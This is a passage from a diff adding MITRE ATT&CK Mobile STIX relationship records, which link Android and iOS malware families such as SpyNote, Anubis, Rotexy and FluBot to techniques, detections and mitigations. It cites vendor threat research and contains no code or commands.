"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T19:00:26.780Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e0ebf0cd-9244-4cef-9171-128a12b87b58", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:32:29.636Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) can read SMS messages.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7af7d094-3a49-4e5e-99d0-385c79f95f06", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) monitors the victim for status and disables other access to the phone by other jailbreaking software.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--04530307-22d8-4a06-9056-55eea225fabb", + "type": "relationship", + "created": "2019-07-10T15:35:43.710Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.842Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) retrieves messages and decryption keys for popular messaging applications and other accounts stored on the device.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cd0f76da-ea06-4710-ab1d-53a7e29a6328", + "created": "2022-03-30T19:34:09.377Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T19:34:09.377Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--8c7862ff-3449-4ac6-b0fd-ac1298a822a5", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d01b311d-8741-4b58-b127-88fecb2b0544", + "created": "2020-04-08T15:41:19.448Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Anubis](https://attack.mitre.org/software/S0422) has a keylogger that works in every application installed on the device.(Citation: Cofense Anubis)", + "modified": "2022-04-15T17:33:02.327Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d13724d0-a5e2-433b-86bf-ead04359edec", + "created": "2022-04-01T15:13:10.022Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "iOS Universal Links", + "url": "https://developer.apple.com/ios/universal-links/", + "description": "Apple. (n.d.). Universal Links for Developers. Retrieved September 11, 2020." + }, + { + "source_name": "Android App Links", + "url": "https://developer.android.com/training/app-links/verify-site-associations", + "description": "Google. (n.d.). Verify Android App Links. Retrieved September 11, 2020." + }, + { + "source_name": "IETF-PKCE", + "url": "https://tools.ietf.org/html/rfc7636", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Developers should use Android App Links(Citation: Android App Links) and iOS Universal Links(Citation: iOS Universal Links) to provide a secure binding between URIs and applications, preventing malicious applications from intercepting redirections. Additionally, for OAuth use cases, PKCE(Citation: IETF-PKCE) should be used to prevent use of stolen authorization codes. ", + "modified": "2022-04-01T15:13:10.022Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d170a088-b115-4a86-b093-8aa32666a470", + "created": "2023-03-15T16:39:55.148Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:39:55.148Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4e9f021d-3cf4-4790-8f7d-f87f33133446", + "created": "2020-12-14T14:52:03.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020.", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:26:37.661Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can collect SMS messages.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a1814198-1f91-41d4-a413-d55e1a66c8e9", + "type": "relationship", + "created": "2020-07-20T13:27:33.548Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T22:00:43.490Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) uses `dumpsys` to determine if certain applications are running.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6d659130-545b-4917-891c-6c1b7d54ed07", + "type": "relationship", + "created": "2021-01-05T20:16:20.505Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.505Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can send SMS messages.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--299931f0-4c60-4a9b-8a6a-4adb6362e590", + "created": "2019-09-23T13:36:08.543Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:57:05.633Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) can access and upload the contacts list to the command and control server.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4a408dee-07da-4855-b2ff-be512480ccb5", + "created": "2023-01-19T18:08:41.596Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:18:05.095Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) can gather device UDIDs.(Citation: trendmicro_tianyspy_0122) ", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ed3293cf-de4f-4a73-98af-24325e8187c9", + "created": "2020-04-24T17:46:31.598Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:51:43.135Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can detect if it is running on a rooted device or an emulator.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--afc0f502-39bb-41e3-b4fc-5b5bb1a1175b", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "modified": "2019-10-10T15:27:22.110Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) contains functionality to record calls as well as the victim device's environment.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fbdbddd7-4980-4061-9192-24a887bc6bad", + "type": "relationship", + "created": "2020-12-07T14:28:32.141Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "modified": "2020-12-07T14:28:32.141Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can open a SOCKS proxy connection through the compromised device.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a3c9d5d6-acc5-46e9-9e4f-b078aeac553c", + "created": "2020-12-14T14:52:03.385Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can fetch a backup C2 domain from Twitter if the primary C2 is unresponsive.(Citation: Sophos Red Alert 2.0)", + "modified": "2022-04-20T17:56:51.457Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d716163d-2492-4088-9235-b2310312ba27", + "created": "2022-04-06T15:44:48.422Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:44:48.422Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--d731c21e-f27d-4756-b418-0e2aaabd6d63", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dcae3b7c-27d2-4377-9dc6-59dae15ac962", + "created": "2019-09-23T13:36:08.456Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:58:03.072Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) can lock an HTML page in the foreground, requiring the user enter credit card information that matches information previously intercepted in SMS messages, such as the last 4 digits of a credit card number. If attempts to revoke administrator permissions are detected, [Rotexy](https://attack.mitre.org/software/S0411) periodically switches off the phone screen to inhibit permission removal.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6f27a13d-b353-47f3-8a71-a13e8c4c3d60", + "type": "relationship", + "created": "2020-09-11T14:54:16.585Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2021-04-19T17:11:50.418Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can collect attacker-specified files, including files located on external storage.(Citation: Lookout Desert Scorpion)\t", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--88e33687-e999-42c8-b46b-49d2adfa17d0", + "created": "2022-04-01T15:02:04.528Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Apple regularly provides security updates for known OS vulnerabilities. ", + "modified": "2022-04-01T15:02:04.528Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--de45db46-2251-4a29-b4d7-3fcf679e9484", + "created": "2019-09-04T15:38:56.877Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019.", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html" + }, + { + "source_name": "FlexiSpy-Features", + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. Retrieved September 4, 2019.", + "url": "https://www.flexispy.com/en/features-overview.htm" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:32:16.401Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can intercept SMS and MMS messages as well as monitor messages for keywords.(Citation: CyberMerchants-FlexiSpy)(Citation: FlexiSpy-Features)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a563fc97-a452-4348-a831-f4fb55c71e35", + "created": "2023-03-03T16:22:45.712Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:22:45.712Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has used fake Verisign and Symantec certificates to bypass malware detection systems. [YiSpecter](https://attack.mitre.org/software/S0311) has also signed malicious apps with iOS enterprise certificates to work on non-jailbroken iOS devices.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5b04c8d0-c026-4838-9383-e4146de36d4d", + "created": "2023-03-16T18:33:19.941Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:33:19.941Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--c4b96c0b-cb58-497a-a1c2-bb447d79d692", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b0fe69e0-d08f-488d-b1cf-3f0dbb28accc", + "created": "2023-02-28T20:37:01.639Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:13:55.642Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can use `locale.getLanguage()` to choose the language for notifications and avoid user detection.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2bbd620d-6deb-4f81-a95b-98a7a74878e9", + "created": "2023-03-20T18:51:07.547Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:07.547Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5482462c-08bc-4e28-bc20-bfbbc60f3f81", + "created": "2022-04-05T20:03:46.789Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T20:03:46.789Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--60623164-ccd8-4508-a141-b5a34820b3de", + "target_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9e95ef68-0650-49eb-888f-47c211481be9", + "created": "2023-03-20T18:51:40.217Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:40.217Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": 